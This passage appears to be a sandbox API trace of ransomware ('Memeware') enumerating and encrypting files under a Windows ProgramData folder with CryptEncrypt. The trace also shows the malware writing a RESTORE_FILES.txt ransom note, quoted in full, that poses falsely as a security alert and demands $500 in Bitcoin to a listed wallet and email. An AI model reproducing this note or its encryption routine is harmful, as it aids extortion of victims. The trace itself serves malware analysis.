pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0066.004] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.008] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0066.008] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0066.008] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt") returned 109 [0066.008] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0066.010] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.010] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0066.010] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.011] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0066.011] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.011] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0066.011] CloseHandle (hObject=0xd8) returned 1 [0066.011] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0066.011] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0066.011] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0066.011] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0066.011] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.011] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="Windows") returned -1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files") returned -1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files (x86)") returned -1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="$Recycle.bin") returned 1 [0066.011] lstrcmpiW (lpString1="netfol.ico", lpString2="System Volume Information") returned -1 [0066.011] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0066.012] StrStrIW (lpFirst="netfol.ico", lpSrch=".protected") returned 0x0 [0066.012] lstrcmpW (lpString1="netfol.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.012] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="Windows") returned -1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files") returned -1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files (x86)") returned -1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="$Recycle.bin") returned 1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="System Volume Information") returned -1 [0066.012] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0066.012] StrStrIW (lpFirst="pictures.ico", lpSrch=".protected") returned 0x0 [0066.012] lstrcmpW (lpString1="pictures.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.012] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0066.012] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98 [0066.012] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0066.012] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0066.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.013] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="Windows") returned -1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files") returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files (x86)") returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="$Recycle.bin") returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="System Volume Information") returned -1 [0066.013] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0066.013] StrStrIW (lpFirst="ringtones.ico", lpSrch=".protected") returned 0x0 [0066.013] lstrcmpW (lpString1="ringtones.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.013] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.013] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.013] lstrcmpiW (lpString1="settings.ico", lpString2="Windows") returned -1 [0066.013] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files") returned 1 [0066.014] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files (x86)") returned 1 [0066.014] lstrcmpiW (lpString1="settings.ico", lpString2="$Recycle.bin") returned 1 [0066.014] lstrcmpiW (lpString1="settings.ico", lpString2="System Volume Information") returned -1 [0066.014] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0066.014] StrStrIW (lpFirst="settings.ico", lpSrch=".protected") returned 0x0 [0066.014] lstrcmpW (lpString1="settings.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.014] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.014] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="Windows") returned -1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files") returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files (x86)") returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="$Recycle.bin") returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="System Volume Information") returned -1 [0066.014] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0066.014] StrStrIW (lpFirst="sync.ico", lpSrch=".protected") returned 0x0 [0066.014] lstrcmpW (lpString1="sync.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.014] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.014] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0066.014] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95 [0066.014] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0066.014] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0066.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.015] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="Windows") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files (x86)") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="$Recycle.bin") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="System Volume Information") returned 1 [0066.015] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93 [0066.015] StrStrIW (lpFirst="wmp.ico", lpSrch=".protected") returned 0x0 [0066.015] lstrcmpW (lpString1="wmp.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.015] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.015] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.015] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0066.015] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0066.016] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt") returned 103 [0066.016] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.016] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.016] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0066.017] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.017] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0066.017] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.017] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0066.017] CloseHandle (hObject=0xd4) returned 1 [0066.017] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Windows") returned -1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files") returned -1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files (x86)") returned -1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="$Recycle.bin") returned 1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="System Volume Information") returned -1 [0066.017] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0066.017] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0066.017] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0066.017] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned 87 [0066.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0066.018] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.018] 